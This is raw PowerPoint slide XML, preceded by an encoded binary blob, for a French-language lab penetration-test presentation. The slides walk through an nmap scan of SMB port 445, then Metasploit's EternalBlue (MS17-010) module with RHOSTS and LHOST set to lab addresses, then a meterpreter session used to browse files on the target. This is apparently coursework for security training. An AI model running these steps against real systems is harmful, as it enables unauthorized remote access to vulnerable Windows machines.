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620334"/>
            <a:ext cx="5143536" cy="275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CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CA" dirty="0" smtClean="0"/>
              <a:t>MERCI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Étapes d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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sz="2800" dirty="0"/>
              <a:t>Nous venons de constater qu’il ya des ports ouverts et le port 445(smbv1) attire notre attention.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>Nous avons exploité les vulnérabilités liées a ce port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>Nous avons utilisé la commande ci-dessous pour avoir les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>detailssur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> le port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0"/>
              <a:t> -p445 --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="1" dirty="0" err="1"/>
              <a:t>protocols</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i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86124"/>
            <a:ext cx="447743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2- Phase d’accès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7215238" cy="68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571472" y="1571612"/>
            <a:ext cx="7572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la suite, nous avons rechercher sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>exploit-db.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>,  les vulnérabilités liées au port 445.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>Ensuite, nous avons lancer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> pour exploiter la vulnérabilité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eternalblue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ms17-010)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> que nous avons la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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714752"/>
            <a:ext cx="4857784" cy="272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500034" y="3071810"/>
            <a:ext cx="721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Sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, nous avons fais une recherche sur les exploit liés à cette vulnérabilité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>msf6&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>etarnalblue</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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2- Phase d’accès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2910" y="1714488"/>
            <a:ext cx="72152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Nous avons utilisé le premier exploit sur la liste de la page précédente et avons éditer les options obligatoires en fonction de nos machines comme suit&amp;	A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>Rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t> 10.10.43.106</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>Lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t> 10.6.2.246</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1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1"/>
            <a:ext cx="4143404" cy="25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357562"/>
            <a:ext cx="427507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2- Phase d’accès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1472" y="1714488"/>
            <a:ext cx="721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Maintenant, c’est le moment de lancer l’exploit pour exploiter la vulnérabilité.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>&gt; exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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6929486" cy="9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86255"/>
            <a:ext cx="7000924" cy="18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928662" y="350043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réussi à accédé à la machine avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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3- Phase d’Exploitation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1472" y="1500174"/>
            <a:ext cx="721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Maintenant que nous avons le contrôle de la machine cible, nous pouvons lancer des commande.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p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57224" y="378619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et manipulation d’un répertoire sur la machine cible</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b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2000240"/>
            <a:ext cx="4000528" cy="169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286256"/>
            <a:ext cx="49149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3- Phase d’Exploitation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1472" y="1500174"/>
            <a:ext cx="721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Ici nous affichons l’adresse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> de la machine attaquée et constatons qu’il s’agit bien de notre machine cible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
